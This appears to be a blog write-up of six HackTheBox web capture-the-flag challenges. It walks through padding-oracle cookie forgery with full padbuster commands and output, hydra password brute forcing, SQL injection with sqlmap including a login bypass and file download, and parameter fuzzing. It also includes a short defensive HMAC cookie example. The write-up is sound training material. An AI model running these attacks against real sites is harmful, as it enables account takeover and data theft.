[HackTheBox] Web Challenges


0x01 [50 Points] I know Mag1k

Challenge description:
Can you get to the profile page of the admin?

The assigned address is a login page that also offers registration:

The usual injection attempts had no effect.
I registered an account on the registration page, logged out, and then tried logging in with an existing username; this reveals a username-enumeration flaw.

One idea at this point was to brute-force the administrator's username first and then combine it with a second-order injection by registering a user such as "admin' --" to become admin. But even hydra with the million-entry rockyou.txt wordlist did not turn up a username, so I suspected this line of thinking was wrong and turned to the post-login page instead.

It is a very simple page with just a USER PROFILE button. Following the challenge's hint, the goal is to reach admin's profile page, and the first thing to examine is the cookie, where the iknowmag1k value looks suspicious:

It looked like a padding oracle. I ran padbuster over it, but the output was garbage. A Hack The Box forum post revealed the catch: the request must also carry the PHPSESSID (the post said all cookies, but in practice this one is enough). The padding-oracle result:

# padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3849

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 4 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq    Status  Length  Location
-------------------------------------------------------
1   1   200 3849    N/A
2   1   500 63  N/A
3 **    254 500 2203    N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 3

Continuing test with selection 3

[+] Success: (186/256) [Byte 8]
[+] Success: (147/256) [Byte 7]
[+] Success: (83/256) [Byte 6]
[+] Success: (66/256) [Byte 5]
[+] Success: (255/256) [Byte 4]
[+] Success: (12/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (95/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 156a4e02aa02e26a
[+] Intermediate Bytes (HEX): a97bf204baae6f47
[+] Plain Text: {"user":

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 4 ***

[+] Success: (252/256) [Byte 8]
[+] Success: (110/256) [Byte 7]
[+] Success: (221/256) [Byte 6]
[+] Success: (126/256) [Byte 5]
[+] Success: (219/256) [Byte 4]
[+] Success: (199/256) [Byte 3]
[+] Success: (228/256) [Byte 2]
[+] Success: (193/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): f2f402b77e145e3b
[+] Intermediate Bytes (HEX): 371b3f2086209005
[+] Plain Text: "qq","ro

*** Starting Block 3 of 4 ***

[+] Success: (161/256) [Byte 8]
[+] Success: (209/256) [Byte 7]
[+] Success: (158/256) [Byte 6]
[+] Success: (168/256) [Byte 5]
[+] Success: (120/256) [Byte 4]
[+] Success: (218/256) [Byte 3]
[+] Success: (106/256) [Byte 2]
[+] Success: (106/256) [Byte 1]

Block 3 Results:
[+] Cipher Text (HEX): d504392ef91095e0
[+] Intermediate Bytes (HEX): 9e91208d5c612d5e
[+] Plain Text: le":"use

*** Starting Block 4 of 4 ***

[+] Success: (28/256) [Byte 8]
[+] Success: (110/256) [Byte 7]
[+] Success: (234/256) [Byte 6]
[+] Success: (8/256) [Byte 5]
[+] Success: (210/256) [Byte 4]
[+] Success: (190/256) [Byte 3]
[+] Success: (223/256) [Byte 2]
[+] Success: (81/256) [Byte 1]

Block 4 Results:
[+] Cipher Text (HEX): 537e654bc49b2f44
[+] Intermediate Bytes (HEX): a726442bfc1590e5
[+] Plain Text: r"}

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): {"user":"qq","role":"user"}

[+] Decrypted value (HEX): 7B2275736572223A227171222C22726F6C65223A2275736572227D0505050505

[+] Decrypted value (Base64): eyJ1c2VyIjoicXEiLCJyb2xlIjoidXNlciJ9BQUFBQU=

-------------------------------------------------------

Decryption shows that the cookie content is {"user":"qq","role":"user"}. Change it to {"user":"qq","role":"admin"} and encrypt it with padbuster:

# padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 3845

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 4

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq    Status  Length  Location
-------------------------------------------------------
1   1   200 3845    N/A
2 **    255 500 2203    N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (97/256) [Byte 8]
[+] Success: (155/256) [Byte 7]
[+] Success: (87/256) [Byte 6]
[+] Success: (153/256) [Byte 5]
[+] Success: (61/256) [Byte 4]
[+] Success: (188/256) [Byte 3]
[+] Success: (151/256) [Byte 2]
[+] Success: (167/256) [Byte 1]

Block 4 Results:
[+] New Cipher Text (HEX): 380060bb67ae639a
[+] Intermediate Bytes (HEX): 516e42c663aa679e

[+] Success: (194/256) [Byte 8]
[+] Success: (151/256) [Byte 7]
[+] Success: (249/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (212/256) [Byte 4]
[+] Success: (209/256) [Byte 3]
[+] Success: (102/256) [Byte 2]
[+] Success: (197/256) [Byte 1]

Block 3 Results:
[+] New Cipher Text (HEX): 5ff80b13f1650f52
[+] Intermediate Bytes (HEX): 339d2929d3046b3f

[+] Success: (132/256) [Byte 8]
[+] Success: (51/256) [Byte 7]
[+] Success: (125/256) [Byte 6]
[+] Success: (192/256) [Byte 5]
[+] Success: (105/256) [Byte 4]
[+] Success: (123/256) [Byte 3]
[+] Success: (98/256) [Byte 2]
[+] Success: (164/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 76e8f2b068a2bd12
[+] Intermediate Bytes (HEX): 549983924480cf7d

[+] Success: (130/256) [Byte 8]
[+] Success: (167/256) [Byte 7]
[+] Success: (153/256) [Byte 6]
[+] Success: (11/256) [Byte 5]
[+] Success: (226/256) [Byte 4]
[+] Success: (20/256) [Byte 3]
[+] Success: (142/256) [Byte 2]
[+] Success: (191/256) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 32579f6894167945
[+] Intermediate Bytes (HEX): 4975ea1bf1645b7f

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: MlefaJQWeUV26PKwaKK9El%2F4CxPxZQ9SOABgu2euY5oAAAAAAAAAAA%3D%3D
-------------------------------------------------------

Log in with the new cookie value and get the flag:

(This part was not my own work; it is copied wholesale from the write-up by the expert on Xianzhi (xz.aliyun.com). This was also my first encounter with padbuster; I should write up how to use it when I have time!)
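As an added, defender-side illustration (not part of the original write-up or of the challenge's code): the cookie above was forgeable because it was CBC-encrypted with no integrity protection and the server answered bad padding with a different status (500) than good padding (200). The block below reproduces the PKCS#7 padding visible in padbuster's hex output, shows the unpad check that acted as the oracle, and sketches the fix, a keyed HMAC tag verified before anything is parsed, so the role edit is rejected. The function names, the key and the cookie layout are my own assumptions; a real fix would also encrypt the body with an authenticated mode, which this stdlib-only example omits.

```python
import base64
import hashlib
import hmac
import json

BLOCK = 8  # padbuster was run with block size 8, as on the page
PAGE_PLAINTEXT = b'{"user":"qq","role":"user"}'  # recovered on the page
SERVER_KEY = b"constructed-demo-key"  # constructed; real servers use a random secret

def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    """Append 1..block bytes, each equal to the pad length (PKCS#7)."""
    n = block - (len(data) % block)
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes, block: int = BLOCK) -> bytes:
    """Strip PKCS#7 padding. This is the check the vulnerable server leaked:
    ValueError became HTTP 500, a clean strip HTTP 200 (padbuster's signatures)."""
    if not data or len(data) % block:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def seal_cookie(payload: dict, key: bytes = SERVER_KEY) -> str:
    """Issue a cookie: compact JSON body plus an HMAC-SHA256 tag under the server key."""
    body = json.dumps(payload, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(body + hmac.new(key, body, hashlib.sha256).digest()).decode()

def open_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Verify the tag (constant time) before parsing anything; return the payload
    or None, so every failure looks identical to the client."""
    try:
        raw = base64.urlsafe_b64decode(cookie)
    except (ValueError, TypeError):
        return None
    body, tag = raw[:-32], raw[-32:]
    if len(tag) != 32 or not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    return json.loads(body)

def forge_role(cookie: str, role: str) -> str:
    """Rewrite role in the body while reusing the old tag (no key): the page's edit."""
    raw = base64.urlsafe_b64decode(cookie)
    payload = json.loads(raw[:-32])
    payload["role"] = role
    body = json.dumps(payload, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(body + raw[-32:]).decode()
```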

0x02 [20 Points] Lernaean

Challenge description:
Your target is not very good with computers. Try and guess their password to see if they may be hiding anything!

The address is a login page that warns you not to brute-force the password, but a quick google of Lernaean returns hydra as the first hit, so brute-forcing it is.

Capture the request in Burp and brute-force it:

The screenshot of the successful brute force is not included, but one note to remember: for passwords on foreign sites, use the rockyou.txt wordlist whenever possible.

0x03 [30 Points] Cartographer

Challenge description:
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?

The dynamic address assigned to us, http://docker.hackthebox.eu:41098/, is a login page.

Enter some random data, submit, and capture the request through the proxy:

A preliminary scan with Burp Scanner finds an injection issue:

Exploit it with sqlmap:

Let sqlmap run slowly in the background; since there is an injection here, an authentication-bypass ("universal password") payload should work as well!

Feed in a wordlist:

A pile of bypass payloads come up, but the login response is a 302 redirect.

It redirects to this page: panel.php?info=home

The home page does not exist, so probe directly for sensitive pages:

Found the flag.

0x04 [20 Points] Emdee five for life

Challenge description:

Can you encrypt fast enough?

Visiting the page reveals a small web script in which the client must compute an MD5 that the server then matches:

The page has a refresh timer, and it is very short. Since a human cannot respond that fast, write a Python script to produce the response automatically.
Based on the HTML source, the Python script is:

import re
import hashlib
import requests

url = "http://docker.hackthebox.eu:52501/"

# One session, so the POST is tied to the same server-side state as the GET
# (the challenge string is refreshed quickly, so both requests must be fast).
s = requests.session()
page = s.get(url)

# Pull the challenge string out of the <h3> tag in the HTML source
pattern = re.compile(r"<h3 align='center'>(\S+)</h3>", re.I)
matches = pattern.findall(page.text)
if not matches:
    raise SystemExit("challenge string not found in page")

# MD5 the string and post the hex digest back in the 'hash' field
digest = hashlib.md5(matches[0].encode("utf-8")).hexdigest()
result = s.post(url, data={"hash": digest})

print(result.text)

Result: the flag is indeed hidden in the page returned on a successful match.

0x05 [20 Points] Fuzzy

Challenge description:
We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.

The initial page is a static page:

Since the page is purely static, with no functionality to call, and the hint says Fuzz, it is time to bring out the tools:

Fuzzing finds /api/action.php; visiting it reports that no parameter is set:

Continue fuzzing for parameters:

Fuzzing finds the parameter reset:

Finally, fuzz the ID:

A usable ID turns up:

Note to self: time to study OWASP properly!

0x06 [30 Points] FreeLancer

Challenge description:
Can you test how secure my website is? Prove me wrong and capture the flag!

A comment in the page returned by the server reveals a page that takes an id parameter:

Manual testing finds a boolean-based SQL injection; go ahead and dump the tables:

This safeadmin table looks interesting; query it:

Found the matching account and password:

Since there is an account and password, there is very likely a corresponding login page.

After much searching and probing I could not find the login page, which meant I could not continue looking for the flag by other means for the time being.

Googling for write-ups by foreign authors turned up one: they had simply found an additional directory with dirsearch: /administrat/

Is my dirsearch not strong enough? No! I'm just too much of a noob! Tears...

Found the login page, but the password obtained is hashed, so it cannot be used to log in directly!

Probe the /administrat/ directory further:

There is a file /administrat/panel.php, which cannot be accessed directly; it redirects to the home page, much like the way an admin home page redirects!

At this point, do not forget the SQL injection point found earlier: throw it into sqlmap and download this panel.php file:

Just as expected; what a hard search that was!~

0x07 References

https://xz.aliyun.com/t/2765
https://www.cnblogs.com/qftm/p/11260600.html
https://petircysec.com/hackthebox-ctf-freelancer/

